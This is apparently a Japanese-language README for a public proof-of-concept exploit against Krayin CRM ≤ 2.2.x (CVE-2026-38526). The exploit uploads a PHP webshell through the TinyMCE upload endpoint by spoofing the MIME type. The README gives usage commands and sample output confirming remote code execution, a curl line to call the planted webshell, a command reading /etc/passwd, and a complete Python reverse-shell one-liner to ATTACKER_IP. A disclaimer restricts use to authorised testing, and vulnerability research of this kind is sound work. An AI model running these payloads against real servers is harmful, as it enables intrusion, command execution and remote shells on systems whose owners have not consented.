
Automated exploit for Krayin CRM ≤ 2.2.x.
Krayin CRM ≤ 2.2.x 向けの自動エクスプロイトです。このスクリプトは、TinyMCEエンドポイント(/admin/tinymce/upload)における無制限ファイルアップロードの脆弱性を悪用し、image/jpeg を偽装してMIMEタイプ検証をバイパスし、PHPウェブシェルをアップロードして、ウェブサーバー権限で任意のコマンドを実行します。
| プロパティ | 値 |
|---|---|
| CVE ID | CVE-2026-38526 |
| 影響を受けるソフトウェア | Krayin CRM ≤ 2.2.x |
| 脆弱性の種類 | 無制限ファイルアップロード → リモートコード実行 |
| 認証 | 必須(有効な管理者アカウント) |
| エンドポイント | POST /admin/tinymce/upload |
requests ライブラリgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload にアップロードします[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
認証に失敗する: 資格情報が正しいこと、および対象システムにアカウントが存在することを確認してください。
CSRFトークンの抽出に失敗する: 対象が脆弱性のあるKrayin CRMを実行していること、およびログインエンドポイントにアクセスできることを確認してください。
リバースシェルが接続しない: リスナー(nc -lvnp <PORT>)が実行されていること、ファイアウォールが発信接続を許可していること、ペイロード内のIP/ポートが正しいことを確認してください。
このツールは、許可されたセキュリティテストおよび教育目的のためだけに提供されています。コンピュータシステムへの不正アクセスは違法です。対象システムをテストする前に適切な許可を得ていることを確認する責任は、すべて利用者にあります。作者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。
b0nyo - PoC実装
TREXNEGRO - 脆弱性の発見
| フラグ | 説明 | 例 |
|---|
-i | 対象URL(http:// の有無は問いません) | http://target.com または target.com |
-u | 管理者のメールアドレス/ユーザー名 | [email protected] |
-p | 管理者のパスワード | AdminPassword123! |
-c | 実行するコマンド(デフォルト: id) | whoami |